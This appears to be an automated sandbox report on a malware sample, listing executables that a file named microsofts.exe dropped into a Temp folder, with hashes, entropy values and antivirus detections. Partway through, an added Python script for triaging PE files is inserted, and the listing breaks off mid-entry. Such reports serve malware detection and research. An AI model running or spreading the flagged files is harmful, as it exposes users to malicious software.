                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:43B36E82B472719A3C24ECFFC5E6E60B8FF0773650428CD49064331893399C6889CFE4F5E45476D302853DFC806C2CD302178D3F2D05FC75C0EEAFD2847E510F
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.........................................................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.16201754756879
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:sO7cCNWB+09wXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:JjNWBP6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:86FF7D7BBBFCFADCD8583DEDCC29DB07
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ED3FEF9DEA639EFCDDB1CF7C0E167ED141987478
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CF468E779F14567D32C0E1292E9B07465DC97470DF21890E6A1C3321C40F9517
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DC10EE455EBABCBC60091B365BCBDD3956C91EBA13C4E2E1FF29B204961B7F29C689FD5DCE44458C8268BE92DB55167867FB7173EBE24CFA351BCF6093B67A16
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@................................."........................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.238923595025769
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:7ihRyhdsRr0sqjnhMgeiCl7G0nehbGZpbD:7ihsoRQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9E700A8BBCB7AEF7BE050EF485E7B350
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E8454E7E0011271A130667B159215919604F8633
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2AFC310360E9E805E0FDA3B7F5E10BC6A41C5BA524BFE3DE960B6245FB8B49A6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2D328733CAAC36E475615AFF3FCCCCC0FD3A4FD212CD782B1C320E24C04E78442C609F1400CF2C1183397743E5F10205391E7DB62ABAD49371358AAE046CB627
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p......CX.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.351000433866241
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:11FDmRF+wpx/Qaf7sqjnhMgeiCl7G0nehbGZpbD:lmRF+wn/JfvDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:768B759266795D08B00DD6F384CBDAE4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EFF7C7CCB7D7861E8CFC11A0F624B7A9C357A869
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:100B643DEEE4F0E146593AD083E3269762304684B34075A4D99EE2BF3390F650
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:163D6918EFA157FFABE1CD74C7B35B24309005CE469CCE825D083FCEF3C3A142099E4597647D181EC2E8D8692E0C2330619DC68E5CE61BE5EA845270CEB5376E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................i................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1228288
Entropy (8bit): 5.161984703387098
Encrypted: false
SSDEEP: 12288:k2Ae621B+0YmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:BE21BPlsqjnhMgeiCl7G0nehbGZpbD
MD5: 8CE9631808D29000B669CCA3CDE3CA3A
SHA1: 7F0900B72804F0C6B6C0078143BAEABEE3F48033
SHA-256: 608A516BE8A14CF5E7171933A901BCB6E5FE750CB9C0389F4B4C414A18FFC89A
SHA-512: 9057F8711398B21AAC4D128A27647D3CDFFD93C11F9DE9806B886FD72A4D728D60CF5682F58D05F329104CC8535BA3A0836943102A584378F965C29CC771D0B7
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 105669632
Entropy (8bit): 7.99998984805857
Encrypted: true
SSDEEP: 3145728:ZLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:pBWx/pt8U7E6aZRfIICU
MD5: 66A16154C1AD6A3F2D33C7907E2ABFD6
SHA1: 36098FB731A4FCD11E76C9675B39CE379D3E2098
SHA-256: 923A1DF18D48DDEE99B84EBA3C30F23F00F4B60851AD005E6043938892F1E83B
SHA-512: 92DF8A85C455CDEC90FE14FE438DE9ABF70B7973B655B3B16E6445EEF7FA9A84C1F9D8AEDFBF4DA49BD2041A0F28117B1552B149907B220D7BE8F7D9517418A3
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1158144
Entropy (8bit): 5.068081620954522
Encrypted: false
SSDEEP: 12288:RxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:RxsqjnhMgeiCl7G0nehbGZpbD
MD5: 385DDF10AA4AFFFC23DED4C16D86BE1A
SHA1: 4409ABDEAAD4C53B5B37C6F9E2D57AB351186292
SHA-256: 19451FDAC27F35B27B7A66735A93379E5A6660D9A78F06173F1CCED3211B43EB
SHA-512: CB2799F91D594DA6D4CBE6FCB321075CED309198EC04253E26A9DCB4D7B58BAE93A06EA1288A05282012A276627677993FB3AA039F614DE6B9CEA5E40FDCE67D
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1142272
Entropy (8bit): 5.032408283818907
Encrypted: false
SSDEEP: 12288:vKqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SqsqjnhMgeiCl7G0nehbGZpbD
MD5: 819D434DC69F0357EBA5CA7A0C8BBB1E
SHA1: 296E8394BEA2C5894F9E88B1AD2355F75C337634
SHA-256: 3C0932DB7B0EF648CE7A578BB108B3F41DB1D387E6B0F2FACD0139E41FF47F7D
SHA-512: BAE2358D06F90C3B69F0AD7A7EBC5CFC56227E12934FE050FA864262B84195A6B5E453F65E5FF1B9036CF810D5B92D94CE4334778E412C5537747E27A57BF7D1
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1375232
Entropy (8bit): 5.4460515589078495
Encrypted: false
SSDEEP: 12288:4nEbH0j4x7R6SvyCMjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:4kwOtO7jsqjnhMgeiCl7G0nehbGZpbD
MD5: 8D8DE7FAD8D3750B0313B72B271DA880
SHA1: DECE716AE27F479BE8D9D94FF2C0AAD3A5C8650A
SHA-256: 588597358CEE98958E8398F4489B71D7E49BDF7A24F88DD4ABA5AF0A55F31E35
SHA-512: 6B51699D03C300389CB928AE8193EAE7D1119BFAEEC9FD5AB4BDEFE6C02A5DDC64358B70A265F44247B9A1CF42297B9F0460B3F029D9040CB47AA49881C61937
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1212416
Entropy (8bit): 5.119728566941759
Encrypted: false
SSDEEP: 12288:Sv1vveXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:u1+sqjnhMgeiCl7G0nehbGZpbD
MD5: 7C22AECE25A829DA55A2D9D18C90B53F
SHA1: 7A61C392531E0407215B5A3E5764AA76C06C49EB
SHA-256: 3DAFA7AEBB592A665AF4BC765D863542378D890CBF935C03C2855A40064D4F6F
SHA-512: B3855517020A5911AD9225B2EA5919504F0C58927C48E85F848F09AB1911F7610F60BE3D60DABA73195711945BF2E6300D5DFEEA64E874CEDFE538805C744848
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1375232
Entropy (8bit): 5.446814314368805
Encrypted: false
SSDEEP: 24576:rnU/h/4KAsqjnhMgeiCl7G0nehbGZpbD:rU/V8Dmg27RnWGj
MD5: 05D9502885A6D62F11D38E4BED8235EC
SHA1: 79B657326F1C7D844547C1D770D20ECC3C8C7617
SHA-256: 074A5CC0A83E6691663D41455673C86C82C15DA48D58C7B50DB6D4FE96E68FFE
SHA-512: 01CC440EBDF43B76CE68AED7AD193ABF4F8A4BD593BFFA529086E5444DA7663D18C4A1218AA47F9F2D0B0ECA58812F4884026CC2B13228BB4BBCC85B24659FD5
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1513984
Entropy (8bit): 5.483733623013464
Encrypted: false
SSDEEP: 24576:Hx71iBLZ05jNTmJWExfsqjnhMgeiCl7G0nehbGZpbD:HxhiHIjNgDDmg27RnWGj
MD5: 67D478D2ACF8F83F91E15FC04F5BB7CC
SHA1: 6EDE17C41D975643E7B60ED43A664042751E41C9
SHA-256: 008A0B4B563EE8F91FA5EAC693DAE66E3D0872DDAAAE4EE3724AE8B0DFB2A0AD
SHA-512: 3D404D77BC79B6CA8B157D2DE4EA25CF9B9B29434D7E0356734750674ECC75E20F9D4B31D730A7B2BCDB37090D658B0ECEEA39FA203F748F217359EDEA027817
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1142272
Entropy (8bit): 5.032887214427371
Encrypted: false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:j3raXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:342F183A9F75BE8BC9D391D57939BF06
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D9371E5B8B8ED1BFE912FEBDE5B9090236FBD4C4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF4C7DD6C3A705735485B4B6D2EBD37221BFAC3F291C72B34BA451D473807610
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:513514A82EBD9A78438D8D9D672A7851CDC46B00F2BAFCD8BCF853571107B28DEC2F5E5FB1A9D71E9C52BD7630F41E91E678B6D9EB3AE7FA32D4B2600EC55A8A
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................H(.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1242112
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1726740658526875
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:SYdP/NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zdP/NsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BEB71E6485CD0F5EA39C8372E2E03900
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7720CB2FE41637193C62BBD4761D490B3A9ABF9F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CB52936716ABFDFC71CB2B215FACF6FA07D1A5489083E07A86E6557A0C06590C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7B9BE925E89C0FC7B37ED9CFA1EEA6539127DDF6EE58921986EFAEDDC77447BE43012CBEA9B9D793E0C46285030BEB63BE3453E2C70F357DA028286BB1689D18
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P......?...........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032903461496591
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:sy5yXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:BgsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:48DC43A3EDEAB9784D6212F96AD685FA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:42DA8CACC16F5577A2BAF16C8131C3E0EEA542CA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DDDA934F49021CEE7103B31FEA4126942FBD9442F641F691485CB088723139B0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6F321063FBF97F449F0DDA20ECE502ADAD330DD388EDC50932E4E410C16794BB411F285B4F76133E2D77BF598B16E21A5066064D6878963C28DBF6B36616E132
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032977228685118
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:+KlqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/EsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9F049974D3F1007E3B7B3A687DAF066F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6230F8504C0E8C7DF1F94295E5A7073FFB2E1297
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2D63BB5E851DFC23F6B194BE8963558F0A30D59C05C618DBFF998C5EE716D43E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:11D108E923D872354C24F6DBFD5BF0E2315DE644BC523DBB55E302A3791ADFBF09CA103E9D8F0671F40F0E783CC4157144E3E5AA03F5795260DFA9271AD408F6
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
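The per-file fields in these dropped-file entries (File Type, Size, Entropy (8bit), MD5/SHA1/SHA-256/SHA-512) can be recomputed locally when triaging samples such as the 1142272-byte files written by C:\Users\user\AppData\Local\Temp\microsofts.exe. The Python below is an added example, not Joe Sandbox's code and not part of the original report: it parses the DOS/PE headers to produce a file(1)-style description (PE32 vs PE32+, console vs GUI subsystem, machine), computes 8-bit Shannon entropy and the four digests. The PE images it runs on are constructed inside the script (headers only, no sections) and are not the dropped files above; the function names are the example's own, and the SSDEEP field is left out because it needs a native fuzzy-hashing library.

```python
import hashlib
import math
import struct
from collections import Counter

# PE/COFF constants (values from the PE format specification).
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
PE32_MAGIC = 0x010B
PE32PLUS_MAGIC = 0x020B
MACHINE_NAMES = {IMAGE_FILE_MACHINE_I386: "Intel 80386", IMAGE_FILE_MACHINE_AMD64: "x86-64"}
SUBSYSTEM_NAMES = {2: "GUI", 3: "console"}  # IMAGE_SUBSYSTEM_WINDOWS_GUI / IMAGE_SUBSYSTEM_WINDOWS_CUI


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant file, 8.0 for uniform bytes.
    This is the quantity reported as 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe_pe(data: bytes) -> str:
    """file(1)-style description, e.g. 'PE32 executable (console) Intel 80386, for MS Windows'.
    Raises ValueError for anything that is not a well-formed PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF file header (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 70 or len(data) < opt + opt_size:
        raise ValueError("optional header truncated")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        fmt = "PE32"
    elif magic == PE32PLUS_MAGIC:
        fmt = "PE32+"
    else:
        raise ValueError(f"unknown optional header magic {magic:#06x}")
    # Subsystem is at offset 68 of the optional header in both PE32 and PE32+.
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    kind = "executable (DLL)" if characteristics & IMAGE_FILE_DLL else "executable"
    sub = SUBSYSTEM_NAMES.get(subsystem, f"subsystem {subsystem}")
    arch = MACHINE_NAMES.get(machine, f"machine {machine:#06x}")
    return f"{fmt} {kind} ({sub}) {arch}, for MS Windows"


def triage(data: bytes) -> dict:
    """The dropped-file fields of the report, computed from raw bytes (hex digests upper-cased as in the report)."""
    return {
        "File Type": describe_pe(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def build_minimal_pe(subsystem: int, magic: int = PE32_MAGIC, machine: int = IMAGE_FILE_MACHINE_I386,
                     characteristics: int = 0x0102) -> bytes:
    """Constructed sample, not one of the dropped files: DOS header + PE signature + COFF header
    + zeroed optional header with only the fields describe_pe() reads populated; no sections."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 224 if magic == PE32_MAGIC else 240
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    samples = (
        ("console-x86", build_minimal_pe(3)),
        ("gui-x86", build_minimal_pe(2)),
        ("console-x64", build_minimal_pe(3, PE32PLUS_MAGIC, IMAGE_FILE_MACHINE_AMD64)),
    )
    for name, image in samples:
        print(name)
        for key, value in triage(image).items():
            print(f"  {key}: {value}")
```

To compare against the report, read each dropped file with `open(path, "rb").read()` and pass it to `triage()`; the digests and size must match the entries above exactly, while the entropy will agree to the printed precision. Entropy around 5 for a 1 MB PE, as reported here, is typical of ordinary compiled code and data, not of a packed or encrypted payload, which would sit near 7.5 to 8.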
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032982622751435
Encrypted:false
SSDEEP:12288:CilqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zEsqjnhMgeiCl7G0nehbGZpbD
MD5:672748C1F93C4331EFD1E308B3B7634B
SHA1:C5106F2EC63E214CC5D2D0A340033D8987F55B4E
SHA-256:E3B05AE4C44CFD31B689302CFEF5F72FB34CF4AB62571416E0DC3F32E09113BB
SHA-512:CB7607312B3A88791A53F93DD07E2A7809BE1E09532FA5E5EA93DA7914646FD11F60B3C1CF85746C94598B7411A1FA801B9091DF67394A511849C0D07962A202
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032948555444677
Encrypted:false
SSDEEP:12288:kTmKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:23sqjnhMgeiCl7G0nehbGZpbD
MD5:8F46E2C92E9B0663FC131CAD6E2607C4
SHA1:C9A5D5189771AC5DFC9E96CFA105F104C4DD4416
SHA-256:F5D43EBA2B2ED3342BCE66EA4E17A426DEBD57973BCB0A31FDC91C1C9B173018
SHA-512:233AECD61CE69E0A7AE9C01FB2FF276CD32D96DE506F021D3AF34F6089C60130EE5170D3DABE9D52F354B552E0C393EEEC1089FD961C580F0B0ACE8E423E8E8A
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.033874644951663
Encrypted:false
SSDEEP:12288:PameXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SDsqjnhMgeiCl7G0nehbGZpbD
MD5:542C9BFF6C241CAB044C0AE6D605FC7F
SHA1:D77F63098AC3F034B477DCDD712493A582EBE735
SHA-256:4AD5A61460FBC7D24E30448F00543B34FB17C76C5BB62D911527B665A047E851
